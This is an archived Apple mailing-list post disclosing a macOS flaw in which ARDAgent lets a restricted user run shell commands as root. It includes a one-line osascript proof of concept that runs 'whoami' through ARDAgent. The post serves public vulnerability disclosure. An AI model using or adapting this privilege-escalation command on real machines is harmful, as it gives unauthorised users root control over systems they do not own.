Mailing Lists: Apple Mailing Lists
Image of Mac OS face in stamp
ARDAgent allows root access for restricted users
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ARDAgent allows root access for restricted users



If you log in as a non-administrative user you can essentially breach security and execute a script as root.

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Interesting that I don't hear about this from Apple or anybody.
_______________________________________________
Do not post admin requests to the list. They will be ignored.
Macos-x-server mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:
This email sent to email@hidden


References: 
 >Multiple Wikis? (From: Randall Meadows <email@hidden>)



Visit the Apple Store online or at retail locations.
1-800-MY-APPLE

Contact Apple | Terms of Use | Privacy Policy

Copyright © 2011 Apple Inc. All rights reserved.